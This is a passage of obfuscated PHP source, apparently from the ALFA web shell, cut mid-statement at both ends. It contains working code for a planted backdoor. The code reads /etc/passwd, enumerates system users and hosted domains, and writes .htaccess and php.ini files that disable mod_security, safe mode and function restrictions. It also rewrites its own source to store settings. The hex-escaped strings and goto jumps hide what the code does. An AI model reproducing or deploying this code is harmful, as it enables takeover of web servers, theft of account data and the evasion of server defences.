"\x3c\164\162\76\74\x74\x64\x20\x73\164\x79\x6c\145\75\42\x74\x65\x78\164\55\141\154\x69\147\156\x3a\x63\145\x6e\164\145\x72\73\42\x3e\x3c\x61\x20\150\162\x65\x66\x3d\42\150\164\x74\160\72\x2f\57\163\x6f\x6c\x65\x76\x69\163\151\x62\154\x65\56\143\157\x6d\57\x63\165\x73\x74\157\155\143\157\x6c\157\162\x73\57\x7b\x68\x65\x6c\160\175\56\160\x6e\147\x22\x20\x74\x61\x72\x67\145\164\x3d\x22\x5f\x62\154\x61\x6e\153\x22\x3e\x3c\146\x6f\x6e\164\x20\143\157\x6c\x6f\162\x3d\42\x23\60\60\106\106\x30\60\x22\x3e\110\145\154\x70\x3c\x2f\146\x6f\156\x74\76\x3c\x2f\x61\76\x3c\x2f\164\144\x3e\74\x74\144\x20\163\x74\171\x6c\145\75\x22\x74\x65\x78\164\x2d\x61\154\x69\x67\156\72\143\145\x6e\164\145\x72\73\42\76\x3c\x64\151\166\40\x63\x6c\x61\163\x73\x3d\42\164\142\x6c\164\170\x74\42\x3e\x7b\x69\156\144\145\x78\x7d\x3c\57\x64\151\x76\76\74\57\x74\144\x3e\74\164\x64\76\74\x64\x69\166\x20\143\154\x61\163\x73\75\x22\x74\142\154\x74\x78\164\42\x20\163\164\171\154\145\75\x22\x6d\x61\x72\147\x69\x6e\x2d\x6c\145\146\164\x3a\x35\x70\170\x3b\42\76\x7b\x74\141\x72\147\145\164\x7d\x3a\74\x2f\x64\x69\x76\76\74\x2f\x74\144\x3e\74\x74\144\76\x3c\x69\x6e\x70\x75\164\x20\163\x74\171\x6c\145\x3d\42\167\151\x64\x74\150\x3a\66\x30\x70\x78\73\x22\x20\155\x75\154\x74\151\75\42\x7b\x6d\165\154\164\151\175\x22\x20\x69\144\x3d\x22\x67\x75\151\x5f\x7b\164\x61\x72\x67\x65\164\x7d\42\40\157\x6e\103\150\141\x6e\x67\145\75\x22\x63\157\x6c\x6f\162\110\141\156\144\x6c\145\162\x28\164\x68\151\163\51\73\42\40\x74\x61\x72\x67\145\x74\75\42\56\173\164\141\x72\147\145\164\x7d\x22\40\164\x79\x70\x65\75\42\x63\x6f\154\x6f\162\42\40\166\x61\154\x75\145\75\x22\173\143\x6f\154\157\162\175\42\x3e\74\x2f\x74\144\76\x3c\x74\x64\x3e\74\x69\156\x70\165\164\40\164\x79\160\x65\x3d\42\x74\145\x78\x74\42\x20\163\x74\x79\154\145\x3d\x22\164\145\x78\x74\55\141\154\151\147\156\72\x63\x65\156\164\x65\x72\x3b\x22\40\x6d\165\154\x74\151\x3d\42\x7b\x6d\165\x6c\164\x69\x7d\42\x20\x6f\x6e\x6b\145\171\165\160\75\42\143\157\154\157\x72\x48\x61\x6e
\144\154\145\x72\x4b\145\171\x28\164\150\x69\163\x29\x3b\x22\x20\x74\141\162\x67\145\x74\75\42\x2e\x7b\x74\141\162\147\x65\164\x7d\42\40\x69\144\x3d\42\151\x6e\160\x75\164\x5f\x7b\x74\141\162\x67\145\164\175\x22\40\143\x6c\141\163\163\75\42\x63\157\154\157\162\x73\x5f\151\x6e\160\x75\x74\x22\40\x70\154\x61\143\x65\x68\x6f\x6c\x64\145\162\x3d\x22\43\x66\146\x66\146\x66\146\42\x20\166\141\x6c\x75\145\75\x22\x7b\x63\x6f\154\157\x72\175\42\x3e\x3c\x2f\164\x64\76\74\57\164\162\x3e"; $x = 1; foreach ($GLOBALS["\x5f\137\101\x4c\x46\101\x5f\103\117\x4c\x4f\122\137\137"] as $key => $value) { $multi = ''; if (is_array($value)) { if (isset($value["\155\165\154\x74\x69\137\x73\x65\154\x65\x63\x74\157\162"])) { $multi = __ZW5jb2Rlcg(json_encode($value)); } } $value = alfa_getColor($key); $help = strtolower(str_replace(array("\72", "\x2b"), array("\x5f", "\137\160\x6c\165\163"), $key)); echo str_replace(array("\x7b\151\x6e\144\145\170\175", "\173\164\x61\x72\147\145\164\175", "\x7b\x63\157\x6c\x6f\x72\175", "\x7b\x6d\165\154\164\x69\175", "\173\x68\x65\x6c\160\175"), array($x++, $key, $value, $multi, $help), $template); } echo 
"\x3c\x74\162\76\x3c\164\144\40\163\x74\171\154\x65\75\x22\164\145\x78\164\55\x61\x6c\x69\147\156\x3a\143\x65\x6e\x74\145\x72\x3b\x22\x3e\55\74\57\x74\144\76\74\164\144\x20\163\x74\x79\154\145\x3d\x22\x74\145\170\x74\55\141\x6c\x69\147\x6e\72\x63\145\156\x74\x65\x72\x3b\x22\x3e\74\144\x69\166\x20\143\x6c\141\163\x73\75\42\164\142\154\x74\170\164\42\x3e\x2a\x3c\57\x64\151\x76\x3e\x3c\x2f\164\144\x3e\x3c\x74\x64\76\74\144\x69\166\x20\x73\x74\x79\154\x65\75\x22\x6d\141\162\147\x69\x6e\x2d\x6c\145\x66\164\x3a\65\160\x78\73\42\40\x63\x6c\x61\163\x73\75\42\164\x62\154\x74\x78\x74\42\x3e\125\163\145\x20\x44\x65\146\141\x75\x6c\x74\x20\x43\x6f\154\157\x72\72\x3c\x2f\x64\151\x76\x3e\74\57\x74\x64\76\x3c\x74\144\76\74\57\x74\x64\x3e\x3c\x74\144\76\x3c\143\x65\156\164\x65\162\x3e\74\x69\156\x70\165\164\x20\164\171\160\x65\x3d\42\x63\150\145\x63\153\x62\157\170\42\40\151\144\x3d\42\165\x73\145\x5f\144\145\x66\x61\x75\154\164\137\143\157\x6c\x6f\162\42\x20\166\141\x6c\x75\145\x3d\x22\61\x22\76\74\x2f\143\145\x6e\164\x65\162\76\x3c\x2f\x74\144\x3e\x3c\57\164\x72\x3e"; echo 
"\x3c\x2f\x74\x62\157\144\x79\76\74\57\164\141\142\x6c\x65\x3e\74\x70\x3e\x3c\x69\156\160\x75\164\x20\x74\x79\160\145\75\x22\163\165\x62\155\x69\164\42\x20\x6e\141\155\x65\x3d\x22\x62\164\x6e\42\40\166\x61\x6c\165\x65\75\x22\x20\42\x3e\74\57\160\x3e\x3c\x2f\x66\157\162\x6d\76\x3c\160\x3e\74\x62\x75\164\164\157\x6e\40\x73\x74\171\154\x65\75\x22\x70\x61\x64\x64\x69\x6e\147\x3a\64\160\x78\73\x3b\155\x61\162\x67\151\x6e\x2d\162\x69\147\150\x74\x3a\x32\x30\160\170\73\42\40\157\x6e\x63\x6c\x69\143\x6b\x3d\x22\44\50\x27\151\155\x70\157\162\164\x46\x69\x6c\145\102\x74\x6e\x27\x29\56\x63\x6c\151\x63\153\50\x29\x3b\x22\x20\x63\154\141\x73\163\x3d\x22\x62\165\x74\x74\157\156\42\76\x20\111\155\x70\x6f\162\164\x20\74\57\x62\165\x74\x74\157\x6e\x3e\40\x3c\x62\165\164\164\x6f\x6e\40\x73\x74\x79\x6c\x65\x3d\42\x70\x61\144\x64\151\x6e\x67\72\64\160\170\x3b\x6d\141\162\x67\x69\156\x2d\154\145\146\164\x3a\62\x30\x70\170\x3b\x22\x20\x6f\156\143\x6c\151\143\x6b\75\42\x67\50\47\x73\x65\x74\x74\x69\156\147\163\47\x2c\156\x75\154\x6c\x2c\x6e\165\154\154\54\156\165\x6c\x6c\54\x6e\165\154\154\x2c\x6e\165\154\x6c\x2c\156\x75\154\154\x2c\156\x75\154\x6c\54\x27\x65\170\x70\157\x72\164\x27\x2c\47\x63\x6f\x6c\x6f\162\47\x29\x22\40\143\154\x61\x73\x73\x3d\42\142\x75\x74\164\157\x6e\x22\76\40\105\170\x70\157\162\164\40\74\x2f\142\x75\164\x74\x6f\156\76\74\57\x63\145\156\164\x65\162\76\74\x2f\x70\x3e"; if ($_POST["\141\154\x66\141\67"] == "\x65\170\160\157\162\x74") { echo __pre(); $colors = is_array($GLOBALS["\104\102\137\116\101\x4d\x45"]["\143\157\154\157\x72"]) ? $GLOBALS["\x44\x42\137\116\x41\x4d\105"]["\143\x6f\154\157\162"] : array(); $glob_colors = $GLOBALS["\x5f\137\101\114\106\101\137\x43\117\114\117\x52\x5f\137"]; $array = array(); foreach ($glob_colors as $k => $v) { if (isset($colors[$k]) && !empty($colors[$k]) && !$is_default) { $v = trim($colors[$k]); } else { $v = trim(is_array($v) ? 
$v["\x6b\x65\x79\137\143\157\154\157\162"] : $v); } $array[$k] = $v; } $file = "\x61\154\146\141\x5f\143\x6f\154\x6f\162\x5f\x63\157\156\146\x69\147\x5f" . date("\x59\55\x6d\55\x64\55\150\x5f\151\x5f\163") . "\x2e\143\157\x6e\146"; $config = json_encode($array, JSON_PRETTY_PRINT); if (!@file_put_contents($file, $config)) { echo "\x3c\x70\x3e\74\x63\x65\x6e\x74\x65\162\76\103\x6f\x6c\157\162\x20\x43\x6f\156\146\151\x67\72\74\142\162\76\74\142\x72\x3e\x3c\x74\x65\x78\164\141\x72\x65\141\x20\x72\x6f\x77\163\75\42\61\62\x22\x20\143\157\154\x73\75\x22\x37\60\x22\40\x74\x79\x70\145\x3d\42\x74\x65\x78\164\x22\x3e" . $config . "\x3c\x2f\x74\145\170\x74\141\162\145\141\x3e\x3c\x2f\143\145\156\164\x65\162\76\74\57\x70\76"; } else { echo "\x3c\x68\63\x3e\74\x70\76\x3c\143\145\x6e\164\x65\162\76\x3c\141\x20\143\x6c\141\x73\x73\x3d\42\141\x63\x74\x69\x6f\156\x73\42\40\150\162\x65\146\75\x22\x6a\141\x76\141\x73\143\x72\x69\x70\164\x3a\166\x6f\x69\144\x28\x30\x29\73\x22\x20\157\x6e\x63\x6c\x69\x63\153\x3d\42\x67\x28\x27\106\151\x6c\x65\x73\x54\157\x6f\154\x73\x27\x2c\156\165\154\154\x2c\x27" . $file . "\x27\x2c\x20\47\x64\157\x77\x6e\154\157\x61\x64\47\x29\x22\x3e\74\146\x6f\156\x74\40\x63\157\154\157\162\x3d\x22\x23\60\106\x30\x22\76\x44\x6f\167\156\x6c\x6f\x61\x64\40\x43\157\x6e\146\x69\x67\x3c\57\146\157\x6e\x74\76\74\57\x61\x3e\x3c\57\143\x65\x6e\164\145\162\76\x3c\x2f\160\76\74\x2f\x68\63\76"; } } if ($_POST["\x61\x6c\x66\x61\62"] == "\76\76") { echo __pre(); $colors = json_decode($_POST["\141\154\x66\x61\61"], true); $array = ''; $is_default = isset($_POST["\x61\x6c\x66\x61\63"]) && $_POST["\141\x6c\x66\141\x33"] == "\x31" ? true : false; $glob_colors = $GLOBALS["\x5f\x5f\101\114\106\101\137\103\117\x4c\x4f\122\x5f\x5f"]; foreach ($glob_colors as $k => $v) { if (isset($colors[$k]) && !empty($colors[$k]) && !$is_default) { $v = trim($colors[$k]); } else { $v = trim(is_array($v) ? $v["\x6b\145\171\x5f\143\x6f\x6c\x6f\162"] : $v); } $array .= "\x22" . trim($k) . 
"\42\40\75\x3e\x20\x22" . $v . "\x22\54"; } @chdir($GLOBALS["\x68\157\x6d\x65\x5f\143\x77\x64"]); $basename = @basename($_SERVER["\x50\x48\x50\137\123\x45\x4c\x46"]); $data = @file_get_contents($basename); $color = "\57\47\x63\157\x6c\157\x72\47\x28\x2e\52\77\x29\x5c\51\x2c\57\163"; if (preg_match($color, $data, $e)) { $new = "\47\x63\x6f\x6c\157\x72\47\x20\x3d\x3e\x20\x61\x72\x72\x61\171\x28" . $array . "\x29\x2c"; $data = str_replace($e[0], $new, $data); if (@file_put_contents($basename, $data)) { echo "\x3c\x63\145\x6e\x74\x65\162\76\x3c\x70\x3e\x3c\150\x33\x3e\133\x2b\135\x20\x53\165\x63\143\x65\163\x73\56\x2e\56\74\57\150\x33\76\74\57\160\76\x3c\57\x63\x65\156\x74\145\162\76\74\x73\x63\162\x69\x70\x74\x3e\x6c\x6f\x63\x61\x74\x69\157\156\x2e\162\145\x6c\x6f\x61\x64\50\51\x3b\x3c\x2f\163\x63\x72\151\x70\164\76"; } else { echo "\x3c\143\x65\156\164\145\x72\x3e\74\x70\x3e\x3c\x68\63\x3e\133\x2d\135\x20\127\145\40\x4e\x6f\164\40\150\x61\166\x65\40\160\145\x72\155\x69\163\163\x69\x6f\156\x20\x74\x6f\40\105\x64\x69\164\x20\163\150\145\154\154\56\56\56\41\74\57\x68\x33\76\74\x2f\160\76\74\x2f\143\145\x6e\164\x65\x72\76"; } } else { echo "\74\143\x65\x6e\x74\145\162\x3e\74\x70\76\x3c\150\x33\76\133\x2d\x5d\40\x45\162\x72\157\x72\56\x2e\56\x21\74\x2f\x68\x33\76\x3c\x2f\160\76\74\x2f\x63\145\156\164\145\x72\x3e"; } } } echo "\74\57\x64\x69\x76\x3e"; alfafooter(); } goto YNiqE; K5MFn: $GLOBALS["\104\x42\137\116\101\x4d\x45"] = $GLOBALS["\x6f\132\147\116\x79\x70\157\x50\122\x55"]; goto r05Ia; i8Olb: $xd .= "\x53\x69\164\145\x20\72\40" . $_SERVER["\110\x54\124\120\x5f\x48\117\x53\124"] . "\15\12"; goto FRkec; IGhSm: function _alfa_is_writable($file) { $check = false; $check = @is_writable($file); if (!$check) { if (_alfa_can_runCommand()) { $check = alfaEx("\x5b\40\55\x77\x20\42" . trim(addslashes($file)) . 
"\x22\40\x5d\x20\46\46\x20\x65\x63\150\x6f\40\42\x79\145\x73\42\x20\174\x7c\x20\x65\143\150\157\40\x22\156\x6f\x22"); if ($check == "\171\x65\x73") { $check = true; } else { $check = false; } } } return $check; } goto HZNvy; ar_2Q: function alfasafe() { alfahead(); echo "\x3c\144\x69\x76\40\143\154\x61\163\x73\x3d\x68\145\141\144\x65\x72\x3e\74\x63\x65\x6e\164\x65\162\76\x3c\142\162\x3e\74\x64\151\166\40\143\x6c\x61\x73\x73\x3d\x27\164\x78\164\x66\157\156\164\x5f\150\145\141\144\x65\x72\47\76\174\x20\x41\x75\x74\157\x20\x42\171\x50\x61\x73\x73\x65\x72\40\x7c\x3c\x2f\x64\x69\166\x3e"; echo "\x3c\x68\x33\76\74\141\40\150\162\x65\146\75\152\141\166\x61\x73\x63\162\151\160\x74\x3a\166\x6f\151\144\50\x30\51\40\x6f\156\x63\154\151\143\153\75\42\147\x28\x27\x73\x61\x66\145\47\54\156\165\x6c\x6c\54\47\160\x68\160\56\151\x6e\x69\47\x2c\156\x75\x6c\x6c\x29\x22\x3e\x7c\40\x50\x48\x50\56\111\116\111\x20\174\x20\74\x2f\x61\x3e\74\141\40\150\162\x65\x66\x3d\x6a\x61\x76\x61\x73\143\162\151\x70\164\72\166\x6f\x69\x64\x28\x30\x29\x20\157\x6e\x63\x6c\151\x63\x6b\75\x22\x67\x28\x27\x73\x61\x66\x65\47\x2c\x6e\x75\154\154\x2c\x6e\165\154\x6c\54\x27\151\x6e\x69\x27\x29\x22\76\174\40\x2e\x68\x74\x61\x63\x63\145\x73\163\x28\x61\x70\141\x63\x68\145\x29\40\174\x20\74\x2f\141\x3e\x3c\x61\x20\150\x72\x65\146\x3d\x6a\141\x76\x61\163\143\x72\x69\160\164\72\166\x6f\x69\144\50\x30\x29\x20\x6f\156\143\154\x69\x63\x6b\x3d\42\x67\50\47\163\x61\146\x65\x27\x2c\x6e\x75\x6c\154\54\156\x75\154\x6c\54\x6e\165\x6c\x6c\54\47\160\154\47\51\42\76\174\x20\x2e\x68\164\x61\x63\x63\145\163\163\x28\x4c\x69\x74\145\x53\160\145\145\x64\51\40\x7c\x3c\x2f\141\76\x3c\x61\40\150\162\x65\x66\x3d\152\x61\166\141\163\x63\x72\x69\160\164\72\166\x6f\x69\144\x28\x30\x29\x20\157\156\143\154\151\x63\153\75\42\x67\x28\x27\163\x61\x66\x65\47\54\x6e\165\x6c\x6c\54\156\x75\154\154\54\156\165\154\154\54\156\165\x6c\154\54\47\x70\141\x73\163\167\x64\47\51\42\x3e\x7c\40\122\145\x61\x64\x2d\x50\x61\163\x73\167\144\x20\x7c\40\x3c\57\x61
\x3e\x3c\141\40\x68\162\x65\x66\x3d\152\141\166\x61\x73\x63\162\151\160\x74\x3a\x76\157\x69\144\x28\x30\x29\x20\x6f\156\143\x6c\x69\x63\153\x3d\42\x67\x28\x27\163\x61\146\x65\47\x2c\x6e\x75\x6c\x6c\x2c\x6e\x75\x6c\x6c\x2c\156\x75\x6c\x6c\x2c\x6e\165\x6c\154\54\156\x75\154\x6c\x2c\x27\165\163\145\x72\x73\47\51\42\76\174\40\x52\x65\141\144\55\x55\163\x65\162\x73\x20\174\x20\74\x2f\141\x3e\x3c\141\x20\150\162\x65\146\x3d\x6a\141\x76\x61\163\x63\162\151\x70\x74\x3a\x76\157\x69\144\50\60\51\40\157\156\x63\x6c\151\x63\x6b\75\42\x67\50\47\163\141\x66\x65\47\54\x6e\x75\x6c\x6c\54\x6e\x75\154\154\54\156\x75\x6c\154\x2c\156\165\154\154\x2c\x6e\165\154\x6c\x2c\x6e\165\x6c\154\54\47\166\141\x6c\x69\141\163\x65\163\47\51\42\x3e\x7c\x20\x47\145\x74\55\x55\x73\145\162\x20\x7c\40\x3c\x2f\x61\76\x3c\x61\x20\150\162\x65\x66\75\152\x61\x76\x61\163\143\x72\151\160\164\x3a\x76\157\151\x64\x28\60\x29\x20\157\x6e\143\154\151\143\153\x3d\x22\x67\x28\x27\163\x61\x66\145\x27\x2c\x6e\165\154\154\x2c\156\x75\x6c\x6c\x2c\156\x75\154\x6c\x2c\156\x75\x6c\154\x2c\x6e\165\x6c\154\54\156\x75\154\x6c\x2c\156\165\x6c\x6c\54\x6e\x75\x6c\x6c\54\x27\144\157\x6d\141\x69\156\x73\x27\51\x22\x3e\x7c\40\107\x65\x74\55\104\x6f\x6d\141\151\156\163\40\x7c\x20\x3c\x2f\x61\76\x3c\x2f\x63\145\x6e\164\145\x72\76\x3c\x2f\x68\x33\x3e"; if (!empty($_POST["\x61\x6c\146\141\70"]) && isset($_POST["\x61\x6c\146\141\70"]) == "\144\157\x6d\141\x69\x6e\x73") { if (!_alfa_file_exists("\x2f\145\x74\x63\x2f\166\x69\x72\164\165\x61\154\x2f\144\157\x6d\141\x69\x6e\x6f\167\x6e\x65\162\163")) { echo __pre(); $solevisible9 = _alfa_file("\x2f\145\164\143\x2f\156\x61\155\x65\x64\x2e\143\x6f\156\x66"); if (is_array($solevisible9)) { foreach ($solevisible9 as $solevisible13) { if (@eregi("\172\157\x6e\145", $solevisible13)) { preg_match_all("\43\x7a\x6f\156\145\40\x22\x28\56\52\x29\x22\x23", $solevisible13, $solevisible14); if (strlen(trim($solevisible14[1][0])) > 2) { echo $solevisible14[1][0] . 
"\x3c\142\x72\x3e"; } } } } } else { echo __pre(); $users = _alfa_file("\x2f\x65\164\x63\57\x76\151\x72\164\165\x61\x6c\57\x64\157\x6d\x61\x69\156\157\x77\x6e\145\162\x73"); if (is_array($users)) { foreach ($users as $boz) { $dom = explode("\x3a", $boz); echo $dom[0] . "\12"; } } } } if (!empty($_POST["\141\154\x66\141\66"]) && isset($_POST["\141\154\146\141\x36"]) == "\166\x61\x6c\151\x61\163\x65\x73") { echo "\12\x3c\x66\157\x72\x6d\40\x6f\156\x73\165\x62\x6d\x69\x74\x3d\x22\147\x28\x27\163\x61\x66\x65\47\x2c\156\x75\x6c\x6c\x2c\x6e\165\x6c\154\x2c\x6e\x75\x6c\x6c\54\156\165\x6c\154\x2c\x6e\165\154\154\54\156\165\x6c\154\54\47\166\141\154\151\141\x73\145\x73\x27\54\x74\150\x69\163\x2e\163\151\164\x65\56\166\141\154\165\145\x2c\156\165\154\154\x2c\x27\x3e\x3e\47\x29\x3b\40\x72\x65\x74\165\162\156\40\x66\141\x6c\x73\x65\x3b\42\x20\155\x65\x74\x68\157\144\x3d\x22\160\x6f\x73\x74\42\40\x2f\76\x3c\143\145\x6e\x74\x65\162\76\74\144\x69\166\x20\143\154\x61\163\x73\x3d\x22\x74\170\x74\146\157\x6e\x74\x22\76\125\x72\154\72\40\74\x2f\x66\157\156\x74\76\x3c\x69\156\x70\x75\x74\x20\164\171\160\145\x3d\x22\x74\145\170\164\42\x20\160\154\141\x63\x65\150\157\154\144\145\x72\75\42\163\151\x74\145\x2e\143\x6f\155\42\40\x6e\x61\x6d\145\x3d\42\x73\151\x74\x65\x22\x20\57\76\x20\x3c\151\x6e\160\x75\x74\x20\x74\171\160\145\x3d\42\163\165\142\155\151\164\x22\40\x76\x61\154\x75\x65\x3d\42\40\42\40\x6e\141\155\x65\x3d\x22\x67\x6f\x22\x20\x2f\x3e\x3c\57\x66\157\x72\155\76\74\x2f\143\x65\156\x74\145\162\76"; if (isset($_POST["\x61\154\x66\141\x39"]) && $_POST["\x61\x6c\x66\141\x39"] == "\x3e\x3e") { if (!_alfa_file_exists("\x2f\145\164\143\x2f\x76\151\162\164\165\x61\x6c\57\x64\157\x6d\x61\151\x6e\x6f\167\156\x65\x72\163")) { $site = trim($_POST["\x61\x6c\146\x61\67"]); $rep = str_replace(array("\x68\x74\x74\x70\x73\x3a\x2f\x2f", "\x68\164\x74\160\72\57\x2f", "\x77\167\167\x2e"), '', $site); $user = ''; if (function_exists("\x70\157\163\151\170\137\x67\x65\x74\160\167\165\x69\144") && 
function_exists("\146\151\x6c\145\x6f\x77\x6e\145\162")) { if ($user = @posix_getpwuid(@fileowner("\x2f\x65\x74\x63\57\166\141\154\x69\141\163\145\163\x2f{$rep}"))) { $user = $user["\x6e\141\x6d\x65"]; } } else { if (_alfa_can_runCommand(true, true)) { $user = alfaEx("\163\x74\141\x74\40\55\143\x20\47\45\125\47\40\57\x65\x74\143\57\166\141\x6c\x69\141\163\145\x73\x2f" . $rep); } } if (!empty($user) && $user != "\x72\157\157\x74") { echo __pre() . "\x3c\x63\x65\156\164\x65\162\x3e\74\x74\x61\142\x6c\x65\40\142\157\162\144\145\162\x3d\x27\61\x27\x3e\74\x74\162\76\74\164\x64\76\x3c\142\x3e\74\x66\x6f\156\x74\40\143\157\154\x6f\162\75\42\x23\106\x46\106\x46\x46\106\42\76\x55\x73\x65\162\x3a\x20\x3c\57\142\x3e\x3c\x2f\146\157\x6e\164\76\74\x2f\164\x64\x3e\x3c\x74\x64\x3e\74\x62\76\x3c\x66\157\156\x74\x20\143\157\x6c\x6f\162\x3d\x22\x23\106\x46\60\60\x30\x30\42\76{$user}\74\57\146\x6f\x6e\164\76\74\x2f\x62\76\x3c\57\x74\144\76\x3c\x2f\x74\162\76\x3c\164\x72\76\x3c\x74\144\76\74\142\x3e\x3c\x66\x6f\x6e\x74\40\x63\157\154\157\162\75\42\x23\106\x46\x46\106\x46\106\x22\x3e\x73\151\x74\x65\72\40\x3c\57\142\76\74\x2f\146\x6f\156\x74\x3e\x3c\x2f\164\x64\76\x3c\x74\x64\x3e\74\142\76\x3c\x66\x6f\x6e\164\x20\143\x6f\x6c\157\162\x3d\42\43\106\106\60\60\60\60\x22\76{$rep}\74\57\146\x6f\156\x74\x3e\74\x2f\142\76\74\57\x74\x64\x3e\x3c\x2f\x74\x72\x3e\x3c\x2f\164\x61\x62\154\x65\x3e\74\57\143\145\156\164\x65\162\x3e"; } else { echo __pre() . 
"\x3c\x63\x65\156\164\145\x72\76\74\142\x3e\116\157\40\x73\165\143\x68\x20\146\151\x6c\145\40\157\x72\x20\x64\x69\x72\x65\143\164\x6f\x72\171\x20\x4f\x72\40\x44\x69\163\141\x62\x6c\145\x20\106\165\x6e\x63\x74\151\157\x6e\163\40\151\163\x20\x6e\157\x74\x20\116\117\116\105\x2e\x2e\x2e\74\57\x62\76\74\57\x63\x65\x6e\x74\145\x72\x3e"; } } else { $site = trim($_POST["\x61\x6c\146\x61\x37"]); $rep = str_replace(array("\x68\x74\164\160\163\x3a\x2f\x2f", "\x68\164\164\160\72\x2f\57", "\x77\x77\x77\x2e"), '', $site); $users = _alfa_file("\x2f\x65\164\x63\x2f\166\151\x72\164\165\141\x6c\57\144\157\155\x61\151\156\x6f\167\x6e\145\x72\x73"); foreach ($users as $boz) { $ex = explode("\x3a", $boz); if ($ex[0] == $rep) { echo __pre() . "\x3c\143\x65\156\164\145\162\x3e\x3c\164\141\x62\x6c\145\40\142\157\162\x64\x65\x72\x3d\47\x31\x27\x3e\xa\74\x74\x72\76\74\x74\x64\x3e\x3c\142\x3e\74\146\157\156\x74\40\143\x6f\x6c\x6f\162\x3d\42\x23\106\x46\106\106\x46\x46\42\76\x55\x73\x65\162\x3a\x20\x3c\x2f\x62\76\74\x2f\x66\157\156\164\x3e\74\x2f\164\x64\76\74\x74\144\x3e\x3c\x62\76\74\x66\x6f\156\x74\x20\143\157\x6c\157\x72\x3d\x22\x23\x46\106\x30\x30\x30\x30\42\x3e" . trim($ex[1]) . 
"\74\x2f\146\157\x6e\x74\x3e\x3c\57\x62\x3e\x3c\57\x74\x64\x3e\x3c\57\164\x72\x3e\12\74\164\x72\76\x3c\164\144\x3e\x3c\x62\x3e\74\146\157\156\164\x20\x63\157\x6c\x6f\x72\75\x22\43\x46\x46\106\106\x46\x46\x22\76\163\x69\164\145\x3a\40\x3c\x2f\142\x3e\74\57\x66\157\156\164\76\74\57\x74\144\x3e\74\x74\144\x3e\74\x62\76\74\x66\157\x6e\164\40\x63\x6f\x6c\x6f\162\75\42\x23\x46\x46\x30\60\60\x30\42\x3e{$rep}\74\57\146\157\156\x74\x3e\74\57\x62\x3e\74\x2f\x74\144\76\74\57\x74\x72\76\74\x2f\164\141\142\x6c\145\x3e\74\57\x63\145\x6e\x74\145\x72\x3e"; break; } } } } } if (!empty($_POST["\x61\x6c\x66\x61\x35"]) && isset($_POST["\141\x6c\146\x61\65"])) { if (!_alfa_file_exists("\x2f\145\x74\x63\x2f\x76\x69\x72\164\x75\x61\x6c\x2f\144\157\155\141\x69\156\x6f\x77\156\x65\162\163")) { echo __pre(); $i = 0; while ($i < 60000) { $line = @posix_getpwuid($i); if (!empty($line)) { while (list($key, $vl) = each($line)) { echo $vl . "\xa"; break; } } $i++; } } else { echo __pre(); $users = _alfa_file("\x2f\x65\164\x63\x2f\166\x69\162\164\165\x61\154\x2f\144\x6f\155\x61\151\x6e\x6f\167\156\x65\162\163"); foreach ($users as $boz) { $user = explode("\72", $boz); echo trim($user[1]) . "\x3c\x62\162\76"; } } } if (!empty($_POST["\x61\154\x66\141\x34"]) && isset($_POST["\141\154\146\141\x34"])) { echo __pre(); if (_alfa_can_runCommand(true, true)) { echo __read_file("\x2f\x65\164\143\57\x70\141\x73\163\x77\x64"); } elseif (function_exists("\x70\x6f\x73\x69\x78\x5f\147\x65\164\160\x77\165\x69\144")) { for ($uid = 0; $uid < 60000; $uid++) { $ara = @posix_getpwuid($uid); if (!empty($ara)) { while (list($key, $val) = each($ara)) { echo "{$val}\x3a"; } echo "\xa"; } } } else { __alert("\146\141\x69\x6c\145\x64\x2e\x2e\56"); } } if (!empty($_POST["\x61\154\x66\x61\62"]) && isset($_POST["\141\x6c\x66\141\x32"])) { @__write_file($GLOBALS["\x63\x77\144"] . 
"\x2e\x68\x74\141\x63\143\x65\x73\163", "\x23\x47\x65\156\145\x72\x61\164\x65\144\x20\x42\171\40\123\157\x6c\x65\40\123\141\x64\40\x61\156\144\x20\x49\x6e\166\151\x73\151\142\x6c\x65\12\74\111\x66\x4d\x6f\x64\165\154\x65\x20\155\157\x64\137\163\x65\x63\165\x72\151\164\171\56\143\76\12\x53\x65\x63\55\x2d\55\55\55\x2d\105\156\x67\x69\x6e\x65\40\117\x66\x66\12\x53\x65\143\55\55\x2d\55\55\x2d\x53\143\x61\x6e\120\117\x53\x54\40\x4f\x66\x66\xa\74\x2f\111\146\x4d\157\x64\x75\154\145\x3e"); echo "\74\x63\145\156\164\x65\162\x3e\x3c\142\x3e\x3c\x62\151\x67\76\x68\x74\x61\143\x63\x65\x73\x73\x20\146\157\x72\40\101\160\x61\143\x68\145\x20\143\162\x65\141\x74\145\144\56\x2e\56\x21\74\x2f\143\145\x6e\164\145\x72\76\74\57\x62\x3e\x3c\x2f\x62\151\x67\76"; } if (!empty($_POST["\x61\x6c\x66\x61\61"]) && isset($_POST["\141\154\x66\141\61"])) { @__write_file($GLOBALS["\x63\167\x64"] . "\x70\x68\x70\x2e\151\156\151", "\x73\141\x66\145\x5f\155\x6f\x64\145\75\117\x46\x46\xa\144\151\163\141\x62\154\x65\x5f\x66\165\156\x63\x74\151\157\x6e\163\75\x42\171\x50\x61\x73\163\145\x64\x20\102\x79\x20\123\x6f\x6c\145\x20\x53\141\x64\x20\x26\40\111\x6e\x76\151\x73\151\142\154\x65\x28\101\114\x46\x41\x20\124\x45\x61\x4d\51"); echo "\x3c\x63\x65\156\x74\145\x72\76\x3c\142\76\x3c\x62\x69\x67\76\40\x70\150\160\x2e\151\156\x69\40\143\162\145\141\164\x65\x64\x2e\56\56\x21\x3c\57\143\145\156\x74\x65\162\x3e\74\x2f\142\x3e\x3c\x2f\x62\151\147\76"; } if (!empty($_POST["\x61\154\x66\141\63"]) && isset($_POST["\141\154\x66\141\63"])) { @__write_file($GLOBALS["\x63\167\x64"] . 
"\56\150\x74\x61\x63\x63\145\163\163", "\43\107\x65\x6e\x65\162\141\x74\145\144\x20\x42\x79\40\123\x6f\x6c\x65\x20\123\x61\x64\40\141\x6e\x64\x20\111\156\166\151\x73\151\142\x6c\x65\xa\74\106\x69\154\145\x73\x20\x2a\x2e\x70\x68\x70\x3e\12\x46\157\x72\143\145\124\x79\x70\x65\40\141\160\x70\x6c\151\x63\x61\164\151\157\156\57\x78\x2d\x68\x74\x74\160\144\55\x70\x68\x70\64\xa\x3c\x2f\106\151\154\x65\163\76\xa\74\x49\x66\115\x6f\x64\x75\x6c\x65\40\x6d\157\x64\x5f\x73\x65\x63\165\162\x69\164\x79\x2e\143\x3e\xa\123\x65\x63\106\151\x6c\x74\x65\x72\105\156\147\151\156\x65\40\x4f\x66\146\12\x53\x65\143\x46\151\154\164\x65\x72\x53\143\x61\156\120\117\x53\124\40\x4f\x66\x66\12\74\x2f\111\x66\x4d\x6f\x64\x75\x6c\x65\x3e"); echo 